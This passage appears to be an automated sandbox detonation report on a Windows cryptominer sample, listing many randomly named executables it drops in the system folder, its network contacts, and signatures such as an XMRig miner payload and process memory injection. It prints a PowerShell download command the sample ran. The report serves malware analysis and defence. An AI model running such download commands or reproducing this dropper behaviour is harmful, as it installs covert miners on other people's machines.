C:\Windows\System\TnQSxYm.exe

C:\Windows\System\tXeSqHB.exe

C:\Windows\System\tXeSqHB.exe

C:\Windows\System\jPSIqMg.exe

C:\Windows\System\jPSIqMg.exe

C:\Windows\System\SNLaTPn.exe

C:\Windows\System\SNLaTPn.exe

C:\Windows\System\QgGyCMd.exe

C:\Windows\System\QgGyCMd.exe

C:\Windows\System\vaLiRyB.exe

C:\Windows\System\vaLiRyB.exe

C:\Windows\System\BPlaWvU.exe

C:\Windows\System\BPlaWvU.exe

C:\Windows\System\XYacfub.exe

C:\Windows\System\XYacfub.exe

C:\Windows\System\vemeGff.exe

C:\Windows\System\vemeGff.exe

C:\Windows\System\tvKCjCx.exe

C:\Windows\System\tvKCjCx.exe

C:\Windows\System\dMhRpdf.exe

C:\Windows\System\dMhRpdf.exe

C:\Windows\System\OrIXLPx.exe

C:\Windows\System\OrIXLPx.exe

C:\Windows\System\FBTENVS.exe

C:\Windows\System\FBTENVS.exe

C:\Windows\System\tYBZdxa.exe

C:\Windows\System\tYBZdxa.exe

C:\Windows\System\XxUptTa.exe

C:\Windows\System\XxUptTa.exe

C:\Windows\System\lfTWXkQ.exe

C:\Windows\System\lfTWXkQ.exe

C:\Windows\System\iHWlfOm.exe

C:\Windows\System\iHWlfOm.exe

C:\Windows\System\NnAHoOO.exe

C:\Windows\System\NnAHoOO.exe

C:\Windows\System\ozjRUkj.exe

C:\Windows\System\ozjRUkj.exe

C:\Windows\System\RgEfhde.exe

C:\Windows\System\RgEfhde.exe

C:\Windows\System\gJDLZwi.exe

C:\Windows\System\gJDLZwi.exe

C:\Windows\System\OLoiwig.exe

C:\Windows\System\OLoiwig.exe

C:\Windows\System\XokQwGs.exe

C:\Windows\System\XokQwGs.exe

C:\Windows\System\xKEsCmg.exe

C:\Windows\System\xKEsCmg.exe

C:\Windows\System\QdlIgGn.exe

C:\Windows\System\QdlIgGn.exe

C:\Windows\System\bMFCktI.exe

C:\Windows\System\bMFCktI.exe

C:\Windows\System\lhVEOZe.exe

C:\Windows\System\lhVEOZe.exe

C:\Windows\System\coadcbE.exe

C:\Windows\System\coadcbE.exe

C:\Windows\System\QHotVPQ.exe

C:\Windows\System\QHotVPQ.exe

C:\Windows\System\xIQyRqU.exe

C:\Windows\System\xIQyRqU.exe

C:\Windows\System\FVnOoqj.exe

C:\Windows\System\FVnOoqj.exe

C:\Windows\System\WTZMVAb.exe

C:\Windows\System\WTZMVAb.exe

C:\Windows\System\lUuRHLw.exe

C:\Windows\System\lUuRHLw.exe

C:\Windows\System\ViSjoLY.exe

C:\Windows\System\ViSjoLY.exe

C:\Windows\System\SjFpYqO.exe

C:\Windows\System\SjFpYqO.exe

C:\Windows\System\TnZKJFR.exe

C:\Windows\System\TnZKJFR.exe

C:\Windows\System\evMjiPe.exe

C:\Windows\System\evMjiPe.exe

C:\Windows\System\EriCpDw.exe

C:\Windows\System\EriCpDw.exe

C:\Windows\System\lEsRbck.exe

C:\Windows\System\lEsRbck.exe

C:\Windows\System\brCQDwK.exe

C:\Windows\System\brCQDwK.exe

C:\Windows\System\OwKueML.exe

C:\Windows\System\OwKueML.exe

C:\Windows\System\uxLFpmi.exe

C:\Windows\System\uxLFpmi.exe

C:\Windows\System\TcqsMWP.exe

C:\Windows\System\TcqsMWP.exe

C:\Windows\System\psGwLjM.exe

C:\Windows\System\psGwLjM.exe

C:\Windows\System\hACtyRs.exe

C:\Windows\System\hACtyRs.exe

C:\Windows\System\DMvNiZg.exe

C:\Windows\System\DMvNiZg.exe

C:\Windows\System\QkwVfrE.exe

C:\Windows\System\QkwVfrE.exe

C:\Windows\System\Qmqmwif.exe

C:\Windows\System\Qmqmwif.exe

C:\Windows\System\GAEygii.exe

C:\Windows\System\GAEygii.exe

C:\Windows\System\NDCDuLC.exe

C:\Windows\System\NDCDuLC.exe

C:\Windows\System\wyWQMZm.exe

C:\Windows\System\wyWQMZm.exe

C:\Windows\System\GeYGQVd.exe

C:\Windows\System\GeYGQVd.exe

C:\Windows\System\HVKVygL.exe

C:\Windows\System\HVKVygL.exe

C:\Windows\System\abbgpOy.exe

C:\Windows\System\abbgpOy.exe

C:\Windows\System\uQMnLOH.exe

C:\Windows\System\uQMnLOH.exe

C:\Windows\System\YNWselh.exe

C:\Windows\System\YNWselh.exe

C:\Windows\System\dWwYaXv.exe

C:\Windows\System\dWwYaXv.exe

C:\Windows\System\DgfVLAi.exe

C:\Windows\System\DgfVLAi.exe

C:\Windows\System\jAJDHDl.exe

C:\Windows\System\jAJDHDl.exe

C:\Windows\System\xmoohkn.exe

C:\Windows\System\xmoohkn.exe

C:\Windows\System\wQzPCME.exe

C:\Windows\System\wQzPCME.exe

C:\Windows\System\AnajMxB.exe

C:\Windows\System\AnajMxB.exe

C:\Windows\System\iSNmuFJ.exe

C:\Windows\System\iSNmuFJ.exe

C:\Windows\System\ZMcWXVo.exe

C:\Windows\System\ZMcWXVo.exe

C:\Windows\System\XjVxDnP.exe

C:\Windows\System\XjVxDnP.exe

C:\Windows\System\zKhYecA.exe

C:\Windows\System\zKhYecA.exe

C:\Windows\System\hgLVQgT.exe

C:\Windows\System\hgLVQgT.exe

C:\Windows\System\BYdQiGu.exe

C:\Windows\System\BYdQiGu.exe

C:\Windows\System\vdRvzts.exe

C:\Windows\System\vdRvzts.exe

C:\Windows\System\llyKeqr.exe

C:\Windows\System\llyKeqr.exe

C:\Windows\System\oayMICA.exe

C:\Windows\System\oayMICA.exe

C:\Windows\System\aswVPgm.exe

C:\Windows\System\aswVPgm.exe

C:\Windows\System\KUCIoFa.exe

C:\Windows\System\KUCIoFa.exe

C:\Windows\System\obtDvLg.exe

C:\Windows\System\obtDvLg.exe

C:\Windows\System\dWBexTx.exe

C:\Windows\System\dWBexTx.exe

C:\Windows\System\pciLMmb.exe

C:\Windows\System\pciLMmb.exe

C:\Windows\System\KgaCBup.exe

C:\Windows\System\KgaCBup.exe

C:\Windows\System\RkZMKNY.exe

C:\Windows\System\RkZMKNY.exe

C:\Windows\System\bCKTBUq.exe

C:\Windows\System\bCKTBUq.exe

C:\Windows\System\vXBdXnX.exe

C:\Windows\System\vXBdXnX.exe

C:\Windows\System\DtLSkNq.exe

C:\Windows\System\DtLSkNq.exe

C:\Windows\System\pGdAHOl.exe

C:\Windows\System\pGdAHOl.exe

C:\Windows\System\dDHxkId.exe

C:\Windows\System\dDHxkId.exe

C:\Windows\System\FtPUgdo.exe

C:\Windows\System\FtPUgdo.exe

C:\Windows\System\TVuPbdt.exe

C:\Windows\System\TVuPbdt.exe

C:\Windows\System\leUpLSd.exe

C:\Windows\System\leUpLSd.exe

C:\Windows\System\sDXZxWl.exe

C:\Windows\System\sDXZxWl.exe

C:\Windows\System\YYBzwTN.exe

C:\Windows\System\YYBzwTN.exe

C:\Windows\System\NjzsyQn.exe

C:\Windows\System\NjzsyQn.exe

C:\Windows\System\aFchUNC.exe

C:\Windows\System\aFchUNC.exe

C:\Windows\System\yBzHDKI.exe

C:\Windows\System\yBzHDKI.exe

C:\Windows\System\FBncTej.exe

C:\Windows\System\FBncTej.exe

C:\Windows\System\GrofTga.exe

C:\Windows\System\GrofTga.exe

C:\Windows\System\ZsTCPHM.exe

C:\Windows\System\ZsTCPHM.exe

C:\Windows\System\uATynuy.exe

C:\Windows\System\uATynuy.exe

C:\Windows\System\IvESQUF.exe

C:\Windows\System\IvESQUF.exe

C:\Windows\System\xvHGNyF.exe

C:\Windows\System\xvHGNyF.exe

C:\Windows\System\cKjoNON.exe

C:\Windows\System\cKjoNON.exe

C:\Windows\System\lIWprXD.exe

C:\Windows\System\lIWprXD.exe

C:\Windows\System\faxPLKi.exe

C:\Windows\System\faxPLKi.exe

C:\Windows\System\vJylxzl.exe

C:\Windows\System\vJylxzl.exe

C:\Windows\System\kkAOpJi.exe

C:\Windows\System\kkAOpJi.exe

C:\Windows\System\WAPGDua.exe

C:\Windows\System\WAPGDua.exe

C:\Windows\System\PGhWAjb.exe

C:\Windows\System\PGhWAjb.exe

C:\Windows\System\TzLraJp.exe

C:\Windows\System\TzLraJp.exe

C:\Windows\System\PbqgOTV.exe

C:\Windows\System\PbqgOTV.exe

C:\Windows\System\JEYSnPY.exe

C:\Windows\System\JEYSnPY.exe

C:\Windows\System\HgkBVtL.exe

C:\Windows\System\HgkBVtL.exe

C:\Windows\System\Crydayp.exe

C:\Windows\System\Crydayp.exe

C:\Windows\System\swTCsnP.exe

C:\Windows\System\swTCsnP.exe

C:\Windows\System\czKMrAp.exe

C:\Windows\System\czKMrAp.exe

C:\Windows\System\IkTlTEp.exe

C:\Windows\System\IkTlTEp.exe

C:\Windows\System\WlhYJQX.exe

C:\Windows\System\WlhYJQX.exe

C:\Windows\System\eToyIJE.exe

C:\Windows\System\eToyIJE.exe

C:\Windows\System\mODmsdt.exe

C:\Windows\System\mODmsdt.exe

C:\Windows\System\rZNFGmO.exe

C:\Windows\System\rZNFGmO.exe

C:\Windows\System\YLUSwQO.exe

C:\Windows\System\YLUSwQO.exe

C:\Windows\System\vUBwLpi.exe

C:\Windows\System\vUBwLpi.exe

C:\Windows\System\HEYPHEC.exe

C:\Windows\System\HEYPHEC.exe

C:\Windows\System\TnUkxPs.exe

C:\Windows\System\TnUkxPs.exe

C:\Windows\System\TdEoLvp.exe

C:\Windows\System\TdEoLvp.exe

C:\Windows\System\ZcSBSIo.exe

C:\Windows\System\ZcSBSIo.exe

C:\Windows\System\zLCaCir.exe

C:\Windows\System\zLCaCir.exe

C:\Windows\System\yOllfvK.exe

C:\Windows\System\yOllfvK.exe

C:\Windows\System\OAHTxXN.exe

C:\Windows\System\OAHTxXN.exe

C:\Windows\System\USabHmr.exe

C:\Windows\System\USabHmr.exe

C:\Windows\System\ZMcbmMG.exe

C:\Windows\System\ZMcbmMG.exe

C:\Windows\System\ZXutAMm.exe

C:\Windows\System\ZXutAMm.exe

C:\Windows\System\mAFnRiB.exe

C:\Windows\System\mAFnRiB.exe

C:\Windows\System\IbTkxUM.exe

C:\Windows\System\IbTkxUM.exe

C:\Windows\System\RkWIAKe.exe

C:\Windows\System\RkWIAKe.exe

C:\Windows\System\WDZwuJt.exe

C:\Windows\System\WDZwuJt.exe

C:\Windows\System\GcxNxQr.exe

C:\Windows\System\GcxNxQr.exe

C:\Windows\System\kznjxPd.exe

C:\Windows\System\kznjxPd.exe

C:\Windows\System\eXmxyKG.exe

C:\Windows\System\eXmxyKG.exe

C:\Windows\System\CnrJBMx.exe

C:\Windows\System\CnrJBMx.exe

C:\Windows\System\EEVkzkX.exe

C:\Windows\System\EEVkzkX.exe

Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp

Files


Analysis: behavioral2

Detonation Overview

Submitted

2024-06-13 21:59

Reported

2024-06-13 22:01

Platform

win10v2004-20240611-en

Max time kernel

125s

Max time network

127s

Command Line

"C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1048 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\PhEMEYy.exe
PID 1048 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\EvkUEIs.exe
PID 1048 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\EvkUEIs.exe
PID 1048 wrote to memory of 5000 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\wyKiHFz.exe
PID 1048 wrote to memory of 5000 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\wyKiHFz.exe
PID 1048 wrote to memory of 2444 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\DdXURTq.exe
PID 1048 wrote to memory of 2444 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\DdXURTq.exe
PID 1048 wrote to memory of 3080 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\GEuQvGW.exe
PID 1048 wrote to memory of 3080 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\GEuQvGW.exe
PID 1048 wrote to memory of 5064 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\dSNZCQF.exe
PID 1048 wrote to memory of 5064 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\dSNZCQF.exe
PID 1048 wrote to memory of 824 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\nDPBRxQ.exe
PID 1048 wrote to memory of 824 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\nDPBRxQ.exe
PID 1048 wrote to memory of 4184 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\lkeyDyB.exe
PID 1048 wrote to memory of 4184 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\lkeyDyB.exe
PID 1048 wrote to memory of 3392 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\OfpgkLf.exe
PID 1048 wrote to memory of 3392 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\OfpgkLf.exe
PID 1048 wrote to memory of 4412 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\oamUrnf.exe
PID 1048 wrote to memory of 4412 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\oamUrnf.exe
PID 1048 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\bslXWOc.exe
PID 1048 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\bslXWOc.exe
PID 1048 wrote to memory of 764 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\AFSEpfB.exe
PID 1048 wrote to memory of 764 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\AFSEpfB.exe

Processes

C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4040,i,7977653611488681184,6839495125838449898,262144 --variations-seed-version --mojo-platform-channel-handle=4340 /prefetch:8


C:\Windows\System\EzgmOSV.exe

C:\Windows\System\EzgmOSV.exe

C:\Windows\System\TksuRdL.exe

C:\Windows\System\TksuRdL.exe

C:\Windows\System\mcvzgeX.exe

C:\Windows\System\mcvzgeX.exe

C:\Windows\System\auETTpO.exe

C:\Windows\System\auETTpO.exe

C:\Windows\System\jwJkRUS.exe

C:\Windows\System\jwJkRUS.exe

C:\Windows\System\UYzlrpd.exe

C:\Windows\System\UYzlrpd.exe

C:\Windows\System\LAFzMrb.exe

C:\Windows\System\LAFzMrb.exe

C:\Windows\System\xjORnrH.exe

C:\Windows\System\xjORnrH.exe

C:\Windows\System\RKLqkwU.exe

C:\Windows\System\RKLqkwU.exe

C:\Windows\System\NHfqIqd.exe

C:\Windows\System\NHfqIqd.exe

C:\Windows\System\HlfXWzl.exe

C:\Windows\System\HlfXWzl.exe

C:\Windows\System\xmFSuSg.exe

C:\Windows\System\xmFSuSg.exe

C:\Windows\System\IMNPWVl.exe

C:\Windows\System\IMNPWVl.exe

C:\Windows\System\pGjexiE.exe

C:\Windows\System\pGjexiE.exe

C:\Windows\System\SHtiJwI.exe

C:\Windows\System\SHtiJwI.exe

C:\Windows\System\bFQrndB.exe

C:\Windows\System\bFQrndB.exe

C:\Windows\System\SGhKath.exe

C:\Windows\System\SGhKath.exe

C:\Windows\System\YEclrcw.exe

C:\Windows\System\YEclrcw.exe

C:\Windows\System\jmGzPTE.exe

C:\Windows\System\jmGzPTE.exe

C:\Windows\System\bNQbWpF.exe

C:\Windows\System\bNQbWpF.exe

C:\Windows\System\CsERiar.exe

C:\Windows\System\CsERiar.exe

C:\Windows\System\SjdrJMf.exe

C:\Windows\System\SjdrJMf.exe

C:\Windows\System\cQVjNAD.exe

C:\Windows\System\cQVjNAD.exe

C:\Windows\System\fNvfAhv.exe

C:\Windows\System\fNvfAhv.exe

C:\Windows\System\MAuqZgB.exe

C:\Windows\System\MAuqZgB.exe

C:\Windows\System\FJsxneu.exe

C:\Windows\System\FJsxneu.exe

C:\Windows\System\UDzhQST.exe

C:\Windows\System\UDzhQST.exe

C:\Windows\System\lOujzAm.exe

C:\Windows\System\lOujzAm.exe

C:\Windows\System\THmvIdY.exe

C:\Windows\System\THmvIdY.exe

C:\Windows\System\SsQPyKc.exe

C:\Windows\System\SsQPyKc.exe

C:\Windows\System\xqDBZks.exe

C:\Windows\System\xqDBZks.exe

C:\Windows\System\NWfQDHs.exe

C:\Windows\System\NWfQDHs.exe

C:\Windows\System\HdEMYIy.exe

C:\Windows\System\HdEMYIy.exe

C:\Windows\System\nXSLzOK.exe

C:\Windows\System\nXSLzOK.exe

C:\Windows\System\wpMGYWq.exe

C:\Windows\System\wpMGYWq.exe

C:\Windows\System\SfLQMQh.exe

C:\Windows\System\SfLQMQh.exe

C:\Windows\System\ZlTfOKY.exe

C:\Windows\System\ZlTfOKY.exe

C:\Windows\System\MLyklzz.exe

C:\Windows\System\MLyklzz.exe

C:\Windows\System\Umulstt.exe

C:\Windows\System\Umulstt.exe

C:\Windows\System\gwzhbgX.exe

C:\Windows\System\gwzhbgX.exe

C:\Windows\System\xROmwQi.exe

C:\Windows\System\xROmwQi.exe

C:\Windows\System\dLSFcRB.exe

C:\Windows\System\dLSFcRB.exe

C:\Windows\System\UyVWbKZ.exe

C:\Windows\System\UyVWbKZ.exe

C:\Windows\System\egieOit.exe

C:\Windows\System\egieOit.exe

C:\Windows\System\BcZvKdK.exe

C:\Windows\System\BcZvKdK.exe

C:\Windows\System\jkXmeRp.exe

C:\Windows\System\jkXmeRp.exe

C:\Windows\System\QPoFikm.exe

C:\Windows\System\QPoFikm.exe

C:\Windows\System\BENUHVK.exe

C:\Windows\System\BENUHVK.exe

C:\Windows\System\gPOwtxq.exe

C:\Windows\System\gPOwtxq.exe

C:\Windows\System\oLaOqSe.exe

C:\Windows\System\oLaOqSe.exe

C:\Windows\System\yoUxGZv.exe

C:\Windows\System\yoUxGZv.exe

C:\Windows\System\egjZvpn.exe

C:\Windows\System\egjZvpn.exe

C:\Windows\System\dIzrVXJ.exe

C:\Windows\System\dIzrVXJ.exe

C:\Windows\System\tISNTke.exe

C:\Windows\System\tISNTke.exe

C:\Windows\System\wRyzFOr.exe

C:\Windows\System\wRyzFOr.exe

C:\Windows\System\HENygTP.exe

C:\Windows\System\HENygTP.exe

C:\Windows\System\PSGXxsX.exe

C:\Windows\System\PSGXxsX.exe

C:\Windows\System\cTvxADk.exe

C:\Windows\System\cTvxADk.exe

C:\Windows\System\nOvoXGW.exe

C:\Windows\System\nOvoXGW.exe

C:\Windows\System\EDtgzTI.exe

C:\Windows\System\EDtgzTI.exe

C:\Windows\System\yQpJffm.exe

C:\Windows\System\yQpJffm.exe

C:\Windows\System\pAneZUf.exe

C:\Windows\System\pAneZUf.exe

C:\Windows\System\roNhCux.exe

C:\Windows\System\roNhCux.exe

C:\Windows\System\BlRnXDZ.exe

C:\Windows\System\BlRnXDZ.exe

C:\Windows\System\TDyFSdz.exe

C:\Windows\System\TDyFSdz.exe

C:\Windows\System\qFAimjm.exe

C:\Windows\System\qFAimjm.exe

C:\Windows\System\vFMElbl.exe

C:\Windows\System\vFMElbl.exe

C:\Windows\System\qPDgUWz.exe

C:\Windows\System\qPDgUWz.exe

C:\Windows\System\njZmiJR.exe

C:\Windows\System\njZmiJR.exe

C:\Windows\System\RlHJnRq.exe

C:\Windows\System\RlHJnRq.exe

C:\Windows\System\EfDapLE.exe

C:\Windows\System\EfDapLE.exe

C:\Windows\System\ARePHMr.exe

C:\Windows\System\ARePHMr.exe

C:\Windows\System\mKpQXDH.exe

C:\Windows\System\mKpQXDH.exe

C:\Windows\System\LizuFKZ.exe

C:\Windows\System\LizuFKZ.exe

C:\Windows\System\QMFBRdn.exe

C:\Windows\System\QMFBRdn.exe

C:\Windows\System\gcguysx.exe

C:\Windows\System\gcguysx.exe

C:\Windows\System\qWppnpU.exe

C:\Windows\System\qWppnpU.exe

C:\Windows\System\LVYkXkF.exe

C:\Windows\System\LVYkXkF.exe

C:\Windows\System\nUjIger.exe

C:\Windows\System\nUjIger.exe

C:\Windows\System\ZgcVQzB.exe

C:\Windows\System\ZgcVQzB.exe

C:\Windows\System\aZnHpHi.exe

C:\Windows\System\aZnHpHi.exe

C:\Windows\System\ZfWfVNE.exe

C:\Windows\System\ZfWfVNE.exe

C:\Windows\System\SPpQsZU.exe

C:\Windows\System\SPpQsZU.exe

C:\Windows\System\cgQgNDB.exe

C:\Windows\System\cgQgNDB.exe

C:\Windows\System\ZeIWlvY.exe

C:\Windows\System\ZeIWlvY.exe

C:\Windows\System\UfShjzb.exe

C:\Windows\System\UfShjzb.exe

C:\Windows\System\RbwIsBr.exe

C:\Windows\System\RbwIsBr.exe

C:\Windows\System\QAmBtrl.exe

C:\Windows\System\QAmBtrl.exe

C:\Windows\System\BAtQaBf.exe

C:\Windows\System\BAtQaBf.exe

C:\Windows\System\jgWZjHR.exe

C:\Windows\System\jgWZjHR.exe

C:\Windows\System\NLMgdSI.exe

C:\Windows\System\NLMgdSI.exe

C:\Windows\System\GrMMwJo.exe

C:\Windows\System\GrMMwJo.exe

C:\Windows\System\jmlTioE.exe

C:\Windows\System\jmlTioE.exe

C:\Windows\System\fRZdxPj.exe

C:\Windows\System\fRZdxPj.exe

C:\Windows\System\IkBHjbf.exe

C:\Windows\System\IkBHjbf.exe

C:\Windows\System\GGPrSqS.exe

C:\Windows\System\GGPrSqS.exe

C:\Windows\System\VYdJMTp.exe

C:\Windows\System\VYdJMTp.exe

C:\Windows\System\sWtoLsJ.exe

C:\Windows\System\sWtoLsJ.exe

C:\Windows\System\XtQVxXk.exe

C:\Windows\System\XtQVxXk.exe

C:\Windows\System\OMXkpxD.exe

C:\Windows\System\OMXkpxD.exe

C:\Windows\System\gIjIldO.exe

C:\Windows\System\gIjIldO.exe

C:\Windows\System\YPSRsHd.exe

C:\Windows\System\YPSRsHd.exe

C:\Windows\System\XDjMYol.exe

C:\Windows\System\XDjMYol.exe

C:\Windows\System\RKnhMAA.exe

C:\Windows\System\RKnhMAA.exe

C:\Windows\System\shqjQBD.exe

C:\Windows\System\shqjQBD.exe

C:\Windows\System\GKvTeee.exe

C:\Windows\System\GKvTeee.exe

C:\Windows\System\vtkvgKm.exe

C:\Windows\System\vtkvgKm.exe

C:\Windows\System\CBEXpvF.exe

C:\Windows\System\CBEXpvF.exe

C:\Windows\System\FLAWeoM.exe

C:\Windows\System\FLAWeoM.exe

C:\Windows\System\GFqwOOg.exe

C:\Windows\System\GFqwOOg.exe

C:\Windows\System\GkCumPL.exe

C:\Windows\System\GkCumPL.exe

C:\Windows\System\EcOtDwo.exe

C:\Windows\System\EcOtDwo.exe

C:\Windows\System\zgAaTTl.exe

C:\Windows\System\zgAaTTl.exe

C:\Windows\System\nbnFrqa.exe

C:\Windows\System\nbnFrqa.exe

C:\Windows\System\oQWnsjD.exe

C:\Windows\System\oQWnsjD.exe

C:\Windows\System\fazdoMN.exe

C:\Windows\System\fazdoMN.exe

C:\Windows\System\UuXGGlk.exe

C:\Windows\System\UuXGGlk.exe

C:\Windows\System\qvzIRnK.exe

C:\Windows\System\qvzIRnK.exe

C:\Windows\System\LCQVzZe.exe

C:\Windows\System\LCQVzZe.exe

C:\Windows\System\TmLNRFy.exe

C:\Windows\System\TmLNRFy.exe

C:\Windows\System\JfaJkTf.exe

C:\Windows\System\JfaJkTf.exe

C:\Windows\System\aOlMxVp.exe

C:\Windows\System\aOlMxVp.exe

C:\Windows\System\FqiKyoW.exe

C:\Windows\System\FqiKyoW.exe

C:\Windows\System\iCNRauV.exe

C:\Windows\System\iCNRauV.exe

C:\Windows\System\zvtwTjO.exe

C:\Windows\System\zvtwTjO.exe

C:\Windows\System\prLRfDL.exe

C:\Windows\System\prLRfDL.exe

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 github.githubassets.com udp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 8.8.8.8:53 154.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 88.251.17.2.in-addr.arpa udp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
NL 23.62.61.129:443 www.bing.com tcp
US 8.8.8.8:53 45.19.74.20.in-addr.arpa udp
US 8.8.8.8:53 129.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 57.15.31.184.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 98.251.17.2.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp

Files
